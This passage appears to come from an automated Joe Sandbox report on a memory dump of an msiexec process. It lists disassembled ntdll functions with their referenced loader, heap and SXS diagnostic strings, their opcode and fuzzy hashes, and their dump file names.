                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-475462383
                                            • Opcode ID: 62bde369a78726e964b6a357becfe1e34c3e0e5f8eb31442ec55c9375223f429
                                            • Instruction ID: 7453ae7311c14f953a6c0351499b786de1edf793ac646ebee7e16c2fe5f83eb3
                                            • Opcode Fuzzy Hash: 62bde369a78726e964b6a357becfe1e34c3e0e5f8eb31442ec55c9375223f429
                                            • Instruction Fuzzy Hash: 8F312272629705DFD214DB29DC95E1A7BE0EF94B10F000768FA806B399E664DC04CBA2
                                            Function 24882674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlGetAssemblyStorageRoot, xrefs: 248C2160, 248C219A, 248C21BA
                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 248C2178
                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 248C219F
                                            • SXS: %s() passed the empty activation context, xrefs: 248C2165
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 248C21BF
                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 248C2180
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                            • API String ID: 0-861424205
                                            • Opcode ID: 6d33a74e6abe5b640e0cdcdc202b8d1d063a2b187b8733c1961a9ca279bc055b
                                            • Instruction ID: e3c4d0c45f8616087340cf0ec68ba533c08a88ecd9c865a5f366bec296954206
                                            • Opcode Fuzzy Hash: 6d33a74e6abe5b640e0cdcdc202b8d1d063a2b187b8733c1961a9ca279bc055b
                                            • Instruction Fuzzy Hash: A331E736E21119FBE7119E96CC90F5B7B68DB65A50F05439ABB04BF284D270EE00D7E2
                                            Function 2487F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                            Download Yara Rule
                                            Strings
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 248C02BD
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 248C02E7
                                            • RTL: Re-Waiting, xrefs: 248C031E
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: 3a9833942e1bbec37b87c5d3460ab0f05afcab0b197c8e3dc1fe6dddd3109db4
                                            • Instruction ID: f0503202242db81e5fc671d372ce3d086b7511a75d7ecb33eb6df404b7033642
                                            • Opcode Fuzzy Hash: 3a9833942e1bbec37b87c5d3460ab0f05afcab0b197c8e3dc1fe6dddd3109db4
                                            • Instruction Fuzzy Hash: 0BE1AB34628741DFD715CF69C890B1ABBF0AF893A4F100B69F6A68B2E1D774D944CB42
                                            Function 2487D7B0 Relevance: 6.4, Strings: 5, Instructions: 151COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1975516107
                                            • Opcode ID: 02f70e9d596916f3170e691a109bfa79d77994a2d8b064544323525e54b5e55b
                                            • Instruction ID: 70d38b01fe98c4cca46186922251add7717f6f9c4d9e7b7829993009305563c7
                                            • Opcode Fuzzy Hash: 02f70e9d596916f3170e691a109bfa79d77994a2d8b064544323525e54b5e55b
                                            • Instruction Fuzzy Hash: 8151DE75A14249DFDB05CFA8C4A4B8DBFF1FF48314F244659E501BB286E7B8A981CB80
                                            Function 248476B2 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                            • API String ID: 0-3061284088
                                            • Opcode ID: 17c3e9bd08a1d32d8f9a89b07855251b63fbaddef4a601e19bf40dd4ec628172
                                            • Instruction ID: b94f0272b9db198d23293a356b9b15915fc4ae741b61d6d66e12f5c6a91e013a
                                            • Opcode Fuzzy Hash: 17c3e9bd08a1d32d8f9a89b07855251b63fbaddef4a601e19bf40dd4ec628172
                                            • Instruction Fuzzy Hash: 07014736434998EFE316D3AAE469F527FE4DF42770F24434AF10047E96DAE898C1C520
                                            Function 24888402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                            Download Yara Rule
                                            Strings
                                            • @, xrefs: 24888591
                                            • LdrpInitializeProcess, xrefs: 24888422
                                            • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 2488855E
                                            • minkernel\ntdll\ldrinit.c, xrefs: 24888421
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1918872054
                                            • Opcode ID: b773df7722439cb774ba7fee21471a601205994d5848888bb25e78b77d7ee330
                                            • Instruction ID: 8c6adc5bf61117d6c76dca4b0f6491ee9b7a74d5c45e5c657a7ada2164a32c26
                                            • Opcode Fuzzy Hash: b773df7722439cb774ba7fee21471a601205994d5848888bb25e78b77d7ee330
                                            • Instruction Fuzzy Hash: 0A919E71529748EFE721CF65CC40E6BBBE8FF88654F400A2EF68496151E374DA44CB52
                                            Function 2488273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                            Download Yara Rule
                                            Strings
                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 248C22B6
                                            • SXS: %s() passed the empty activation context, xrefs: 248C21DE
                                            • .Local, xrefs: 248828D8
                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 248C21D9, 248C22B1
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                            • API String ID: 0-1239276146
                                            • Opcode ID: 944e35992c504d4dfd65eff330432cffbe4456f4dc02bce983dc7f64b75d9bd1
                                            • Instruction ID: 60d90094f5296a1531912ab5b210f5e7f939cbba0d1974d6394b30a9d0c11dbd
                                            • Opcode Fuzzy Hash: 944e35992c504d4dfd65eff330432cffbe4456f4dc02bce983dc7f64b75d9bd1
                                            • Instruction Fuzzy Hash: 0FA1AB35A2122DDBDB25CF64DC84B99B7B0BF58714F1046EAD908AB291D770DE80CF92
                                            Function 248564AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                            Download Yara Rule
                                            Strings
                                            • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 248B1028
                                            • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 248B106B
                                            • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 248B10AE
                                            • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 248B0FE5
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                            • API String ID: 0-1468400865
                                            • Opcode ID: 2ae01816dba168a232c611062b3e7362028a065800b192d28a0e15ed23811eaf
                                            • Instruction ID: 38abf51053a15077f39a62ddcd3b124b314dfd0aa8b1e25e065e934cac5d779d
                                            • Opcode Fuzzy Hash: 2ae01816dba168a232c611062b3e7362028a065800b192d28a0e15ed23811eaf
                                            • Instruction Fuzzy Hash: 6371C0B1924304EFD711DF18C884F8B7BA8AF65B64F400668F9489B29AD774D588CFD2
                                            Function 2484F626 Relevance: 5.2, Strings: 4, Instructions: 188COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                                            • API String ID: 0-2586055223
                                            • Opcode ID: 9c066fa9b51d0530186c2d313729d4b676e7c430d8f9691829945802a9cee2f7
                                            • Instruction ID: f0659d0b428f1b8d1e238286bb53ec763ef63947427060494127b48cf42f82d8
                                            • Opcode Fuzzy Hash: 9c066fa9b51d0530186c2d313729d4b676e7c430d8f9691829945802a9cee2f7
                                            • Instruction Fuzzy Hash: BB614732265688EFE312CB68C854F677BE8EF84750F040A58FA958B291D7B4D941CB62
                                            Function 2487245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                            Download Yara Rule
                                            Strings
                                            • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 248BA992
                                            • apphelp.dll, xrefs: 24872462
                                            • LdrpDynamicShimModule, xrefs: 248BA998
                                            • minkernel\ntdll\ldrinit.c, xrefs: 248BA9A2
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-176724104
                                            • Opcode ID: ad487151fda837facecc7a76af6d67e45a8a816d24e7f3b332180f0c0ed6c086
                                            • Instruction ID: 76df177a6063a2e3e1b5acd644ca093ed1bbf3bf442490a9a087a8fa9e27551d
                                            • Opcode Fuzzy Hash: ad487151fda837facecc7a76af6d67e45a8a816d24e7f3b332180f0c0ed6c086
                                            • Instruction Fuzzy Hash: 39311871B20205EFD7269FADC890E5ABBB5FF84B10F110259F950BB355C7B45981CB90
                                            Function 248F94E0 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $ $0
                                            • API String ID: 0-3352262554
                                            • Opcode ID: 5f00095b66ca3776090f88ce3ea12c95d1c97be095b60606b2e37fe45855a05a
                                            • Instruction ID: 09bbbbdaec457c60ef05ce6ceed5df40173c3064418fef30eb5dbc84f2b9eb4e
                                            • Opcode Fuzzy Hash: 5f00095b66ca3776090f88ce3ea12c95d1c97be095b60606b2e37fe45855a05a
                                            • Instruction Fuzzy Hash: 9032F1B1618381CFE311CF68C884B5BBBE5BB88344F514A2EF59987350E7B5E948CB52
                                            Function 24860770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-4253913091
                                            • Opcode ID: 838df8eaff27ca595f9a1f6623e97f7bc1a448728a9dc2504c3030c5a969418b
                                            • Instruction ID: 6478116719c3a2f4dcbf65560593765dc75d9185374509f362e8bdbbfcc3b6b0
                                            • Opcode Fuzzy Hash: 838df8eaff27ca595f9a1f6623e97f7bc1a448728a9dc2504c3030c5a969418b
                                            • Instruction Fuzzy Hash: 25F17A30A20609DFE716CF68C890F6ABBF5FF45704F1082A8E5569B385D774AA81CF90
                                            Function 24851460 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                            Download Yara Rule
                                            Strings
                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 24851728
                                            • HEAP: , xrefs: 24851596
                                            • HEAP[%wZ]: , xrefs: 24851712
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                            • API String ID: 0-3178619729
                                            • Opcode ID: 5a60b93d446e3159771a23b3b9cc064fa822db90a27ef3754f16f1a83667df2c
                                            • Instruction ID: c23418c0779e96f3abbfd4e7107f47c73354c9d92779e4378ccf70d83bc3fb98
                                            • Opcode Fuzzy Hash: 5a60b93d446e3159771a23b3b9cc064fa822db90a27ef3754f16f1a83667df2c
                                            • Instruction Fuzzy Hash: 17E12131E24285DFDB16CF68C490B7ABBF1EF48300F158A9DE9968B256E774E940CB50
                                            Function 2485B6C0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                            • API String ID: 0-1145731471
                                            • Opcode ID: 199dcaec164daa2da4a51bb93354ce5ca838e8ce1e7b61ca22a3587d6e3f849f
                                            • Instruction ID: 70c766626d600e85d1c65b2d7068271839c8280d5af922982490c2fe118f3070
                                            • Opcode Fuzzy Hash: 199dcaec164daa2da4a51bb93354ce5ca838e8ce1e7b61ca22a3587d6e3f849f
                                            • Instruction Fuzzy Hash: 29B1DE71A24609DFDB16CF68C880F9DBBB2BF54310F154A29E991EB394D7B0E940CB41
                                            Function 248D368C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                            • API String ID: 0-2391371766
                                            • Opcode ID: 8d7d27b1b4e692cf1b656abd42ccbc2ad83dc8eb7c700724e5e2a264f5babb6c
                                            • Instruction ID: b8349c47db58a4c7ad986cc515bb5b7a9a2944a0976b52f9087b683514c7d9b0
                                            • Opcode Fuzzy Hash: 8d7d27b1b4e692cf1b656abd42ccbc2ad83dc8eb7c700724e5e2a264f5babb6c
                                            • Instruction Fuzzy Hash: 00B1837262A745EFE311CF64C880F5BBBE8EB44754F004A29FA50AB254D7B4ED44CB92
                                            Function 248E36EE Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                            • API String ID: 0-318774311
                                            • Opcode ID: 3b412893cbe5d15353e049de0dc3027fdfbb50f62468e82a1caa9d0800afdc60
                                            • Instruction ID: f7e41823efb85d5dc36bdd1e982a74e42794872008212f5f4434b9d0eff9fbea
                                            • Opcode Fuzzy Hash: 3b412893cbe5d15353e049de0dc3027fdfbb50f62468e82a1caa9d0800afdc60
                                            • Instruction Fuzzy Hash: 65816C71729345EFE311CB15C840F6ABBE8EF86750F000A69BA989B390D7B4DD04CB52
                                            Function 248D7410 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                            • API String ID: 0-3870751728
                                            • Opcode ID: 707d7ab636133be8753d018cd25bd6be89600b03a87a9052ded9af004ef42f4c
                                            • Instruction ID: 686f4476ba440439fc57e0c4f21a815a6af12772504f3d7e475a32c28e3839fe
                                            • Opcode Fuzzy Hash: 707d7ab636133be8753d018cd25bd6be89600b03a87a9052ded9af004ef42f4c
                                            • Instruction Fuzzy Hash: 0D915AB1E11609DFEB14CF69D880B9DBBF1BF48304F14826AE905AB395E7759842CF50
                                            Function 2485B440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                            • API String ID: 0-373624363
                                            • Opcode ID: 07ccd7e4d83682b3df2b0019c744d8cbbd1253e478cb7c6a8b4e8bf1db2df5bd
                                            • Instruction ID: d74f2ee1cbab08393e22d097450abc2f7417e33f03b6d8abf9e72371ff9edd32
                                            • Opcode Fuzzy Hash: 07ccd7e4d83682b3df2b0019c744d8cbbd1253e478cb7c6a8b4e8bf1db2df5bd
                                            • Instruction Fuzzy Hash: FA91D0B1E25649CFDB15CF58C850BAE7BB0FF20354F164395E951AB3A0D7B89A80CB90
                                            Function 2488909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: %$&$@
                                            • API String ID: 0-1537733988
                                            • Opcode ID: 964553c919bd907720b53ee6148fd139327f83fdccbf41a22bfce5bc73cae199
                                            • Instruction ID: f06081f119963f8f2e57696eab0e3e991838606731a5558433ff4b4c8d8843a2
                                            • Opcode Fuzzy Hash: 964553c919bd907720b53ee6148fd139327f83fdccbf41a22bfce5bc73cae199
                                            • Instruction Fuzzy Hash: 0771CC70628309DFD705CF24C988A0BBBE5BF98718F108B5DF5A987691C770EA05CB92
                                            Function 2492B73C Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                            Download Yara Rule
                                            Strings
                                            • TargetNtPath, xrefs: 2492B82F
                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 2492B82A
                                            • GlobalizationUserSettings, xrefs: 2492B834
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2543609208.0000000024820000.00000040.00001000.00020000.00000000.sdmp, Offset: 24820000, based on PE: true
                                            • Associated: 0000000B.00000002.2543609208.0000000024949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.000000002494D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000B.00000002.2543609208.00000000249BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_24820000_msiexec.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                            • API String ID: 0-505981995
                                            • Opcode ID: 3262438d5459833021651a8282fc2b6123863f36f0a2957f874a8a878c90a448
                                            • Instruction ID: bce27762d880521a2f0f0b377764e46574dc0f6f9a8021a7216dbba2b96443ba
                                            • Opcode Fuzzy Hash: 3262438d5459833021651a8282fc2b6123863f36f0a2957f874a8a878c90a448
